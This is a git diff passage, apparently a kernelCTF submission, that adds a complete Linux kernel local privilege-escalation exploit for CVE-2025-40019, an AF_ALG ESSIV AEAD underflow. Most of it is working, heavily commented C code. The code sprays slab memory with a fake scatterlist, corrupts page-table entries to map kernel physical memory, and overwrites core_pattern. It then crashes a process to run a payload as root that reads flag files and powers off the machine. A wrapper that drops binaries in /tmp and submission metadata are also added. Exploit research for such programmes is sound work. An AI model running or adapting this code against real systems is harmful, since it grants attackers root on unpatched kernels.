17 total splices (8+8+1) ensures + * areq->tsgl_entries is large -> tsgl lands in a bigger kmalloc slab. */ +#define SPLICE_COUNT_PER_PIPE 0x8 +/* Bytes per splice call */ +#define SPLICE_CHUNK_SIZE 0x4 /* ORIGINAL: must keep small for correct SGL chain layout */ +/* Pipe fill size (pages of data written to each pipe) */ +#define PIPE_FILL_SIZE 0x2000 /* ORIGINAL: 8KB per pipe */ + +/* Number of valid iovec entries for the sacrificial recvmsg */ +#define RECVMSG_VALID_IOVECS 32 +/* Total iovec count passed to recvmsg (rest are zero-initialized) */ +#define RECVMSG_TOTAL_IOVECS 0x100 + +/* Size of the crafted Unix datagram payload for slab reclaim */ +#define CRAFT_PAYLOAD_SIZE 0x208 +/* Offset within the crafted payload where the fake scatterlist entry is placed. + * Calculated as 0x10 + 0xf * 0x20 = 0x1f0, aligning with where scatterwalk_ffwd + * reads after walking past valid entries with the overflowed offset. */ +#define FAKE_SGL_ENTRY_OFFSET (0x10 + 0xf * 0x20) +/* Fake scatterlist length: large unsigned value that causes scatterwalk_ffwd to + * consume most of the remaining overflowed offset in a single subtraction. */ +#define FAKE_SGL_LENGTH 0xffffffe0U + +/* + * struct scatterlist field offsets: + * unsigned long page_link; // +0x00 + * unsigned int offset; // +0x08 + * unsigned int length; // +0x0c + * dma_addr_t dma_address; // +0x10 + * unsigned int dma_length; // +0x18 + * unsigned int dma_flags; // +0x1c + */ +#define SCATTERLIST_OFFS_PAGE_LINK 0x00 +#define SCATTERLIST_OFFS_OFFSET 0x08 +#define SCATTERLIST_OFFS_LENGTH 0x0c + +/* + * Mask for extracting the page-aligned physical address from the leaked + * value at trampoline_pgd. The _brk area is 64KB-aligned, so masking the + * low 16 bits yields the correct page frame base. + */ +#define PHYS_ADDR_ALIGN_MASK 0xffffUL + +/* Authenc key layout: 8-byte RTA header + 32-byte HMAC key + 16-byte AES key */ +#define RTA_HEADER_SIZE 8 +#define HMAC_KEY_SIZE 32 +#define AES_KEY_SIZE 16 +#define TOTAL_KEY_SIZE (RTA_HEADER_SIZE + HMAC_KEY_SIZE + AES_KEY_SIZE) + +/* AES block / IV size */ +#define AES_IV_SIZE 16 + +/* ESSIV sendmsg payload size */ +#define ESSIV_SENDMSG_LEN 0x20 + +/* core_pattern payload written through the remapped PTE */ +#define CORE_PATTERN_PAYLOAD "|/proc/%P/root/tmp/exp/exploit %P" +#define PUD_PROBE_COUNT 3 + +/* ------------------------------------------------------------------ */ +/* ESSIV IV pre-computation (embedded AES-256-ECB + SHA-256) */ +/* ------------------------------------------------------------------ */ + +/* + * Pre-computed ESSIV salt = SHA256(enc_key || auth_key). + * enc_key = {0x10..0x1f}, auth_key = {0x00..0x1f} + * The kernel's essiv_aead_setkey hashes the combined keys to derive the + * AES-ECB key used for IV encryption. + */ +static const uint8_t essiv_salt[32] = { + 0x4d, 0x62, 0x42, 0x4a, 0x90, 0xb0, 0x75, 0xd0, + 0xaf, 0x9f, 0xed, 0x1c, 0x82, 0xa0, 0x93, 0x27, + 0xd9, 0x71, 0xa0, 0xca, 0x43, 0x77, 0xfd, 0x78, + 0x85, 0x69, 0x44, 0x0b, 0xa2, 0xe7, 0xde, 0x6f +}; + +/* + * Pre-compute the IV that will produce the desired page-table value after ESSIV + * encryption. The exploit stores the desired output in iv[0..15], and this + * function replaces it with the corresponding AES-256-ECB decryption (the + * inverse of what the kernel will encrypt). + */ +static void compute_iv(uint8_t *iv, int is_pass2) +{ + uint8_t iv_dec[AES_IV_SIZE]; + aes256_ecb_decrypt(essiv_salt, iv, iv_dec); + + printf("ESSIV decrypted IV (%s runtime): ", is_pass2 ? "pass2" : "pass1"); + for (int i = 0; i < AES_IV_SIZE; i++) printf("%02x", iv_dec[i]); + printf("\n"); + + memcpy(iv, iv_dec, AES_IV_SIZE); +} + +/* ------------------------------------------------------------------ */ +/* Utility */ +/* ------------------------------------------------------------------ */ + +static void pin_cpu(int cpu) +{ + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(cpu, &mask); + sched_setaffinity(0, sizeof(mask), &mask); +} + +/* + * Build the authenc key blob used by both the sacrificial and ESSIV sockets. + * Layout: [4-byte RTA len][4-byte AES keylen][32-byte HMAC key][16-byte AES key] + */ +static void build_authenc_key(unsigned char *key) +{ + memset(key, 0, TOTAL_KEY_SIZE); + /* RTA header: type=1 (CRYPTO_AUTHENC_KEYA_PARAM), len=8 */ + key[0] = 0x08; key[1] = 0x00; key[2] = 0x01; key[3] = 0x00; + /* AES key length = 16 (AES-128) */ + key[4] = 0x00; key[5] = 0x00; key[6] = 0x00; key[7] = 0x10; + for (int i = 0; i < HMAC_KEY_SIZE; i++) key[RTA_HEADER_SIZE + i] = i; + for (int i = 0; i < AES_KEY_SIZE; i++) key[RTA_HEADER_SIZE + HMAC_KEY_SIZE + i] = i + 0x10; +} + +/* ------------------------------------------------------------------ */ +/* Helper: create an AEAD transform socket and set the authenc key. */ +/* Returns tfmfd; the caller must accept() to get an opfd. */ +/* ------------------------------------------------------------------ */ + +static int create_aead_tfmfd(const char *alg_name) +{ + struct sockaddr_alg sa = { + .salg_family = AF_ALG, + .salg_type = "aead", + }; + strncpy((char *)sa.salg_name, alg_name, sizeof(sa.salg_name) - 1); + + int tfmfd = SYSCHK(socket(AF_ALG, SOCK_SEQPACKET, 0)); + if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) != 0) { + perror("bind(aead)"); + exit(1); + } + + unsigned char key[TOTAL_KEY_SIZE]; + build_authenc_key(key); + if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) != 0) { + perror("setsockopt(ALG_SET_KEY)"); + exit(1); + } + + return tfmfd; +} + +/* ------------------------------------------------------------------ */ +/* Step 2a: Create a sacrificial authenc AEAD with pipe-page TX SGL */ +/* entries. Closing pipes makes alg socket the sole page ref. */ +/* ------------------------------------------------------------------ */ + +/* + * Create an authenc(hmac(sha512),cbc(aes)) AEAD socket and splice anonymous + * pipe pages into its TX SGL. When recvmsg is called later (in + * spray_fake_scatterlist), _aead_recvmsg builds a chained SGL: + * first_rsgl[0..15] -> chain -> second_rsgl[0..N] -> chain -> tsgl (pipe pages) + * af_alg_free_resources then frees everything: second_rsgl, put_page on pipe + * pages (freeing them to page allocator), tsgl, and the areq itself. + * The slab slots retain residual data including chain links. + */ +static int setup_sacrificial_aead(char *data_buf) +{ + int tfmfd = create_aead_tfmfd("authenc(hmac(sha512),cbc(aes))"); + + /* Fill two pipes with data to be spliced into the AEAD scatterlist */ + int pipe_a[2], pipe_b[2]; + SYSCHK(pipe(pipe_a)); + SYSCHK(pipe(pipe_b)); + write(pipe_a[1], data_buf, PIPE_FILL_SIZE); + write(pipe_b[1], data_buf, PIPE_FILL_SIZE); + + /* Accept after pipes are filled -- preserves the original allocation + * ordering, which is important for correct slab placement. */ + int opfd = SYSCHK(accept(tfmfd, NULL, 0)); + + /* Send initial data with ALG_SET_OP=DECRYPT and ALG_SET_IV via sendmsg */ + unsigned char local_iv[AES_IV_SIZE] = {0}; + struct iovec iov = { data_buf, AUTHENC_SENDMSG_LEN }; + + char cbuf[CMSG_SPACE(sizeof(uint32_t)) + CMSG_SPACE(sizeof(struct af_alg_iv) + AES_IV_SIZE)]; + memset(cbuf, 0, sizeof(cbuf)); + + struct msghdr msg = {0}; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = cbuf; + msg.msg_controllen = sizeof(cbuf); + + struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_OP; + cmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t)); + *(uint32_t *)CMSG_DATA(cmsg) = ALG_OP_DECRYPT; + + cmsg = CMSG_NXTHDR(&msg, cmsg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_IV; + cmsg->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + AES_IV_SIZE); + struct af_alg_iv *ivmsg = (struct af_alg_iv *)CMSG_DATA(cmsg); + ivmsg->ivlen = AES_IV_SIZE; + memcpy(ivmsg->iv, local_iv, AES_IV_SIZE); + + ssize_t sent = sendmsg(opfd, &msg, MSG_MORE); + if (sent < 0) { perror("sendmsg(authenc)"); exit(1); } + printf("[*] Authenc sendmsg: %zd bytes\n", sent); + + /* Splice anonymous pipe pages into the AEAD socket to create many TX SGL entries. + * 8 splices from pipe_a + 8 from pipe_b (all with SPLICE_F_MORE) + 1 final. + * Using 17 splices ensures areq->tsgl_entries is large, placing the tsgl + * allocation in a bigger kmalloc slab (e.g., kmalloc-1024) that is less + * likely to be reclaimed by other kernel heap activity before the PTE spray. */ + for (int i = 0; i < SPLICE_COUNT_PER_PIPE; i++) + SYSCHK(splice(pipe_a[0], 0, opfd, 0, SPLICE_CHUNK_SIZE, SPLICE_F_MORE)); + for (int i = 0; i < SPLICE_COUNT_PER_PIPE; i++) + SYSCHK(splice(pipe_b[0], 0, opfd, 0, SPLICE_CHUNK_SIZE, SPLICE_F_MORE)); + SYSCHK(splice(pipe_b[0], 0, opfd, 0, 1, 0)); /* final splice without MORE */ + + close(pipe_a[0]); + close(pipe_a[1]); + close(pipe_b[0]); + close(pipe_b[1]); + + return opfd; +} + +/* ------------------------------------------------------------------ */ +/* Step 2b/2c: recvmsg builds chained SGL then frees it; ctl_buf */ +/* spray reclaims second_rsgl with crafted fake SGL entry. */ +/* ------------------------------------------------------------------ */ + +/* + * Phase 2b: recvmsg on the sacrificial authenc socket with 32 iovecs + * (1 byte each) builds a chained SGL inside the areq: + * first_rsgl[0..15] (16 entries, length=1 each) + * -> sgl[16] chain -> second_rsgl (sock_kmalloc'd) + * -> chain -> areq->tsgl (anonymous pipe pages from af_alg_pull_tsgl) + * After the crypto op, af_alg_free_resources frees second_rsgl, calls + * put_page on pipe pages (freeing them to page allocator), and frees areq. + * Slab slots retain residual data including all chain links. + * + * Phase 2c: sendmsg on Unix socket with msg_control = 0x208 crafted bytes. + * ____sys_sendmsg does sock_kmalloc(0x208) -> copy -> sock_kfree_s, reclaiming + * the second_rsgl slab slot. The crafted data plants a fake SGL entry with + * length=0xffffffe0 at FAKE_SGL_ENTRY_OFFSET. The chain link to old tsgl + * (beyond offset 0x208) is preserved as residual data. + * + * Result: areq slab has residual chained SGL: + * first_rsgl[0..15] (1-byte each) -> chain -> second_rsgl (crafted, 0xffffffe0) + * -> chain -> tsgl (freed pipe pages, to be reclaimed as PTE pages) + * + * The ESSIV recv allocates its areq from this same slab slot. outlen = 0 + * causes af_alg_get_rsgl to return early (sg_init_table never called), so + * the entire first_rsgl.sgl.sgl[] is uninitialized -- containing this + * residual chained SGL. + */ +static void spray_fake_scatterlist(int authenc_opfd, int unix_sock) +{ + /* Allocate two pages, unmap the second to limit how much recvmsg consumes */ + char *pbuf = mmap(NULL, 2 * PAGE_SIZE, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANON, -1, 0); + munmap(pbuf + PAGE_SIZE, PAGE_SIZE); + + /* Set up iovec: 32 valid 1-byte entries, rest zero-initialized */ + struct iovec iov[RECVMSG_TOTAL_IOVECS] = {0}; + for (int i = 0; i < RECVMSG_VALID_IOVECS; i++) { + iov[i].iov_base = pbuf; + iov[i].iov_len = 1; + } + + struct msghdr msg = {0}; + msg.msg_iov = iov; + msg.msg_iovlen = RECVMSG_TOTAL_IOVECS; + + /* Phase 2b: recvmsg builds chained SGL (first_rsgl -> second_rsgl -> tsgl), + * runs crypto op, then af_alg_free_resources frees everything -- put_page + * on pipe pages frees them to page allocator. Residual chain links remain. */ + recvmsg(authenc_opfd, &msg, 0); + + /* Phase 2c: ctl_buf spray reclaims second_rsgl slab slot with crafted data. + * ____sys_sendmsg: sock_kmalloc(0x208) -> copy -> sock_kfree_s. + * Chain link to old tsgl (beyond 0x208 bytes) is preserved as residual. */ + char *craft = pbuf; + memset(craft, 0, CRAFT_PAYLOAD_SIZE); + /* Place a fake struct scatterlist at FAKE_SGL_ENTRY_OFFSET within the + * second_rsgl slab slot. scatterwalk_ffwd will: + * 1. Walk first_rsgl[0..15]: 16 x length=1 -> consumes 16 from 0xfffffff0 + * 2. Follow chain (sgl[16]) -> second_rsgl (this crafted entry) + * 3. length=0xffffffe0 -> consumes remaining 0xffffffe0, len becomes 0 + * 4. sg_next follows preserved chain -> tsgl entry (freed pipe page = PTE page) + * 5. IV write lands on PTE page */ + *(size_t *)&craft[FAKE_SGL_ENTRY_OFFSET + SCATTERLIST_OFFS_PAGE_LINK] = 0x4141414140; + *(int *)&craft[FAKE_SGL_ENTRY_OFFSET + SCATTERLIST_OFFS_OFFSET] = 0; + *(int *)&craft[FAKE_SGL_ENTRY_OFFSET + SCATTERLIST_OFFS_LENGTH] = FAKE_SGL_LENGTH; + + printf("[*] Crafted fake SGL at %p\n", craft); + msg.msg_control = craft; + msg.msg_controllen = CRAFT_PAYLOAD_SIZE; + + sendmsg(unix_sock, &msg, 0); +} + +/* ------------------------------------------------------------------ */ +/* Root payload (executed via core_pattern as root) */ +/* ------------------------------------------------------------------ */ + +/* + * When invoked via core_pattern with a PID argument, steal the crashing + * process's stdin/stdout/stderr and read the flag. + */ +static void root_payload(const char *pid_str) +{ + int pid = strtoull(pid_str, NULL, 10); + int pidfd = syscall(434 /*pidfd_open*/, pid, 0); + int stdinfd = syscall(438 /*pidfd_getfd*/, pidfd, 0, 0); + int stdoutfd = syscall(438 /*pidfd_getfd*/, pidfd, 1, 0); + int stderrfd = syscall(438 /*pidfd_getfd*/, pidfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Read the flag multiple times for reliability (first attempt may fail + * if stdout is not yet fully connected). The final invocation also + * triggers sysrq-o (poweroff) so the kernelCTF PR verification workflow + * can proceed to the next attempt quickly instead of waiting for a timeout. */ + system("cat /flag 2>/dev/null; cat /root/flag 2>/dev/null"); + system("cat /flag 2>/dev/null; cat /root/flag 2>/dev/null"); + system("cat /flag 2>/dev/null; cat /root/flag 2>/dev/null; echo o>/proc/sysrq-trigger"); + exit(0); +} + +/* ------------------------------------------------------------------ */ +/* Vulnerability-only trigger for the kernelCTF vuln-verify workflow */ +/* ------------------------------------------------------------------ */ + +static int vuln_trigger(void) +{ + static char data_buf[ESSIV_SENDMSG_LEN] = {0}; + static char out_buf[ESSIV_SENDMSG_LEN] = {0}; + unsigned char iv[AES_IV_SIZE] = {0}; + char cbuf[CMSG_SPACE(sizeof(__u32)) + + CMSG_SPACE(sizeof(struct af_alg_iv) + AES_IV_SIZE) + + CMSG_SPACE(sizeof(__u32))]; + + int opfd = SYSCHK(accept( + create_aead_tfmfd("essiv(authenc(hmac(sha256),cbc(aes)),sha256)"), + NULL, 0)); + + struct msghdr msg = {0}; + struct iovec iov = { data_buf, sizeof(data_buf) }; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = cbuf; + msg.msg_controllen = sizeof(cbuf); + + struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_OP; + cmsg->cmsg_len = CMSG_LEN(sizeof(__u32)); + *(__u32 *)CMSG_DATA(cmsg) = ALG_OP_DECRYPT; + + cmsg = CMSG_NXTHDR(&msg, cmsg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN; + cmsg->cmsg_len = CMSG_LEN(sizeof(__u32)); + *(__u32 *)CMSG_DATA(cmsg) = 0; + + cmsg = CMSG_NXTHDR(&msg, cmsg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_IV; + cmsg->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + AES_IV_SIZE); + struct af_alg_iv *ivmsg = (struct af_alg_iv *)CMSG_DATA(cmsg); + ivmsg->ivlen = AES_IV_SIZE; + memcpy(ivmsg->iv, iv, AES_IV_SIZE); + + int ret = sendmsg(opfd, &msg, 0); + printf("[*] vuln-trigger sendmsg returned: %d errno=%d\n", + ret, ret < 0 ? errno : 0); + if (ret >= 0) { + ret = recv(opfd, out_buf, sizeof(out_buf), 0); + printf("[*] vuln-trigger recv returned: %d errno=%d\n", + ret, ret < 0 ? errno : 0); + } + + return ret < 0 ? 1 : 0; +} + +/* ------------------------------------------------------------------ */ +/* Main exploit flow */ +/* ------------------------------------------------------------------ */ + +int main(int argc, char **argv) +{ + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stdout, NULL, _IONBF, 0); + + if (argc > 1) { + if (!strcmp(argv[1], "--vuln-trigger")) + return vuln_trigger(); + /* When invoked as root via core_pattern with PID argument */ + root_payload(argv[1]); + } + + /* --- Step 0: Set up IPC and fork for two-pass exploit --- */ + static char data_buf[0x1000000]; /* 16 MB general-purpose data buffer */ + int unix_sockfd[2]; + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, unix_sockfd)); + + int phys_addr_pipe[2]; + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, phys_addr_pipe)); + pin_cpu(0); + + size_t stext_phys = 0; + if (fork() == 0) { + /* Child: wait for parent to leak _stext physical address */ + pin_cpu(1); + read(phys_addr_pipe[0], &stext_phys, sizeof(stext_phys)); + /* Falls through to run pass 2 with stext_phys set */ + } + + /* --- Step 1: Pre-compute IV to encode the desired PTE value --- */ + unsigned char exploit_iv[AES_IV_SIZE]; + if (stext_phys) { + /* Pass 2 (child): make the overwritten PUD a huge leaf covering + * the 1GB physical region containing core_pattern. */ + size_t core_phys = stext_phys + CORE_PATTERN_PAGE_BASE; + size_t pa_target = (core_phys & ~PUD_HUGE_MASK) | PTE_FLAGS_SECOND_PASS; + printf("[*] Pass 2: core_pattern PA = %zx\n", core_phys + CORE_PATTERN_PAGE_OFFSET); + printf("[*] Pass 2: huge-PUD target = %zx\n", pa_target); + *(size_t *)&exploit_iv[0] = pa_target; + *(size_t *)&exploit_iv[8] = 0; + } else { + /* Pass 1 (parent): make the overwritten PUD a huge leaf mapping + * physical 0..1GB so TRAMPOLINE_PHYS is readable through a probe VA. */ + *(size_t *)&exploit_iv[0] = PTE_FLAGS_FIRST_PASS; + *(size_t *)&exploit_iv[8] = 0; + } + compute_iv(exploit_iv, stext_phys ? 1 : 0); + + /* --- Step 2a: Create sacrificial authenc AEAD with many SGL entries --- */ + int authenc_opfd = setup_sacrificial_aead(data_buf); + + /* --- Step 3: Spray user page tables as write targets --- */ + char *addrs[PTE_SPRAY_COUNT]; + char *maddr = (void *)PTE_SPRAY_BASE; + for (int i = 0; i < PTE_SPRAY_COUNT; i++) { + addrs[i] = SYSCHK(mmap(maddr + PTE_SPRAY_SPACING * i, PAGE_SIZE, + PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANON | MAP_FIXED, -1, 0)); + } + + /* Map one probe page in each likely user PUD without faulting it in yet. + * If the overflow rewrites one of those PUD entries into a 1GB huge leaf, + * touching the matching probe VA after the trigger accesses kernel physical + * memory through the corrupted page-table entry. */ + char *pud_probe_addrs[PUD_PROBE_COUNT] = {0}; + size_t pass2_core_phys = stext_phys ? (stext_phys + CORE_PATTERN_PAGE_BASE) : 0; + size_t probe_off = stext_phys ? + (pass2_core_phys & PUD_HUGE_MASK) : + TRAMPOLINE_PHYS; + for (int i = 0; i < PUD_PROBE_COUNT; i++) { + void *probe = (void *)(probe_off + (size_t)i * PUD_HUGE_SIZE); + pud_probe_addrs[i] = mmap(probe, PAGE_SIZE, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANON | MAP_FIXED, -1, 0); + if (pud_probe_addrs[i] == MAP_FAILED) { + perror("mmap(pud_probe)"); + pud_probe_addrs[i] = NULL; + } else { + printf("[*] PUD huge probe[%d]=%p off=%zx\n", i, pud_probe_addrs[i], probe_off); + } + } + + /* --- Set up the vulnerable ESSIV AEAD socket --- */ + int opfd = SYSCHK(accept( + create_aead_tfmfd("essiv(authenc(hmac(sha256),cbc(aes)),sha256)"), + NULL, 0)); + + /* Send 0x20 bytes with ALG_SET_OP=DECRYPT, ALG_SET_AEAD_ASSOCLEN=0. + * This triggers the integer overflow (0 - ivsize = 0xfffffff0) and also + * ensures outlen = used - authsize = 0x20 - 0x20 = 0, which causes + * af_alg_get_rsgl to return early without initializing the RX SGL. */ + char cbuf[CMSG_SPACE(sizeof(__u32)) + + CMSG_SPACE(sizeof(struct af_alg_iv) + AES_IV_SIZE) + + CMSG_SPACE(sizeof(__u32))]; + struct msghdr msg = {0}; + struct iovec iov = { data_buf, ESSIV_SENDMSG_LEN }; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = cbuf; + msg.msg_controllen = sizeof(cbuf); + + struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_OP; + cmsg->cmsg_len = CMSG_LEN(sizeof(__u32)); + *(__u32 *)CMSG_DATA(cmsg) = ALG_OP_DECRYPT; + + cmsg = CMSG_NXTHDR(&msg, cmsg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN; + cmsg->cmsg_len = CMSG_LEN(sizeof(__u32)); + *(__u32 *)CMSG_DATA(cmsg) = 0; /* assoclen=0, causes integer overflow */ + + cmsg = CMSG_NXTHDR(&msg, cmsg); + cmsg->cmsg_level = SOL_ALG; + cmsg->cmsg_type = ALG_SET_IV; + cmsg->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + AES_IV_SIZE); + struct af_alg_iv *ivmsg = (struct af_alg_iv *)CMSG_DATA(cmsg); + ivmsg->ivlen = AES_IV_SIZE; + memcpy(ivmsg->iv, exploit_iv, AES_IV_SIZE); + + int ret = sendmsg(opfd, &msg, 0); + if (ret < 0) { perror("sendmsg(essiv)"); return 1; } + + int rcvbuf_val = 0; + SYSCHK(setsockopt(opfd, SOL_SOCKET, SO_RCVBUF, &rcvbuf_val, sizeof(rcvbuf_val))); + + /* --- Step 2b/2c: Free scatterlist and reclaim with crafted entry --- */ + spray_fake_scatterlist(authenc_opfd, unix_sockfd[1]); + + /* Touch all sprayed pages to ensure PTEs are populated. + * volatile prevents the compiler from optimizing away the reads. */ + volatile int sum = 0; + for (int i = 0; i < PTE_SPRAY_COUNT; i++) + sum += addrs[i][0]; + + /* --- Step 4: Trigger the overflow via recv --- */ + printf("[*] Triggering ESSIV recv (scatterwalk overflow)...\n"); + fflush(stdout); + ret = recv(opfd, data_buf, ESSIV_SENDMSG_LEN, 0); + printf("[*] ESSIV recv returned: %d (errno=%d)\n", ret, ret < 0 ? errno : 0); + fflush(stdout); + + /* --- Probe huge-PUD candidates without touching the broad spray again --- */ + int found_hit = 0; + if (!stext_phys) { + printf("[*] Probing %d huge-PUD candidates for trampoline leak...\n", PUD_PROBE_COUNT); + fflush(stdout); + for (int i = 0; i < PUD_PROBE_COUNT; i++) { + if (!pud_probe_addrs[i]) + continue; + volatile size_t *q = (volatile size_t *)pud_probe_addrs[i]; + size_t pa_leak = 0; + for (int j = 0; j < 512; j++) { + if (q[j]) { + pa_leak = q[j]; + break; + } + } + printf("[*] PUD probe %d q0=%zx q1=%zx leak=%zx\n", + i, (size_t)q[0], (size_t)q[1], pa_leak); + fflush(stdout); + if (!pa_leak) + continue; + + size_t pa_stext = (pa_leak & ~PHYS_ADDR_ALIGN_MASK) - BRK_BASE; + printf("[+] Pass 1 huge-PUD hit at probe %d: leak=%zx stext_phys=%zx\n", + i, pa_leak, pa_stext); + fflush(stdout); + write(phys_addr_pipe[1], &pa_stext, sizeof(pa_stext)); + found_hit = 1; + break; + } + } else { + printf("[*] Writing core_pattern payload through %d huge-PUD candidates...\n", PUD_PROBE_COUNT); + fflush(stdout); + for (int i = 0; i < PUD_PROBE_COUNT; i++) { + if (!pud_probe_addrs[i]) + continue; + strcpy(pud_probe_addrs[i] + CORE_PATTERN_PAGE_OFFSET, CORE_PATTERN_PAYLOAD); + printf("[+] Pass 2 wrote core_pattern candidate via probe %d at %p\n", + i, pud_probe_addrs[i] + CORE_PATTERN_PAGE_OFFSET); + fflush(stdout); + found_hit = 1; + } + } + + if (!found_hit) { + printf("[-] No huge-PUD overwrite detected in probe candidates.\n"); + printf("[-] Scatterwalk may have walked a different path.\n"); + fflush(stdout); + } + + /* --- Step 5/6: Trigger privilege escalation via core_pattern --- */ + if (stext_phys) { + if (fork() == 0) { + setsid(); + puts("[+] Triggering core_pattern execution..."); + *(volatile size_t *)0 = 0; /* segfault -> core dump -> root */ + } + } + + // @sleep(desc="Keep parent/child alive while core_pattern handler runs") + while (1) sleep(1); +} diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/wrapper.c b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/wrapper.c new file mode 100644 index 000000000..841d77fab --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/exploit/mitigation-v4-6.12/wrapper.c @@ -0,0 +1,63 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include + +extern const unsigned char _binary_payload_bin_start[]; +extern const unsigned char _binary_payload_bin_end[]; +extern const unsigned char _binary_ld_bin_start[]; +extern const unsigned char _binary_ld_bin_end[]; +extern const unsigned char _binary_libc_bin_start[]; +extern const unsigned char _binary_libc_bin_end[]; + +static void write_blob(const char *path, const unsigned char *start, + const unsigned char *end, mode_t mode) +{ + int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode); + if (fd < 0) { + perror(path); + _exit(127); + } + + const unsigned char *p = start; + while (p < end) { + ssize_t n = write(fd, p, end - p); + if (n < 0) { + if (errno == EINTR) + continue; + perror("write"); + _exit(127); + } + p += n; + } + close(fd); + chmod(path, mode); +} + +int main(int argc, char **argv) +{ + const char *dir = "/tmp/exp/.exp505"; + const char *payload = "/tmp/exp/.exp505/payload"; + const char *ldso = "/tmp/exp/.exp505/ld-linux-x86-64.so.2"; + const char *libc = "/tmp/exp/.exp505/libc.so.6"; + + mkdir("/tmp/exp", 0755); + mkdir(dir, 0755); + write_blob(payload, _binary_payload_bin_start, _binary_payload_bin_end, 0755); + write_blob(ldso, _binary_ld_bin_start, _binary_ld_bin_end, 0755); + write_blob(libc, _binary_libc_bin_start, _binary_libc_bin_end, 0755); + + if (argc > 1) { + execl(ldso, ldso, "--library-path", dir, payload, argv[1], NULL); + } else { + execl(ldso, ldso, "--library-path", dir, payload, NULL); + } + + perror("exec payload"); + return 127; +} diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/metadata.json b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/metadata.json new file mode 100644 index 000000000..a4cdc24c2 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/metadata.json @@ -0,0 +1,26 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp505"], + "vulnerability": { + "summary": "ESSIV AEAD assoclen underflow in the AF_ALG decryption path", + "cve": "CVE-2025-40019", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6bb73db6948c2de23e407fe1b7ef94bf02b7529f", + "affected_versions": ["5.4 - 6.18"], + "requirements": { + "attack_surface": [], + "capabilities": [], + "kernel_config": [ + "CONFIG_CRYPTO_USER_API", + "CONFIG_CRYPTO_USER_API_AEAD", + "CONFIG_CRYPTO_ESSIV" + ] + } + }, + "exploits": { + "mitigation-v4-6.12": { + "uses": [], + "requires_separate_kaslr_leak": false, + "stability_notes": "Flag captured on the live mitigation-v4-6.12 target. This is a novelty-only follow-up submission for the huge-PUD adaptation; reliability has not yet been batch measured." + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/original.tar.gz b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/original.tar.gz new file mode 100644 index 000000000..abb1f36a9 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-40019_mitigation_2/original.tar.gz differ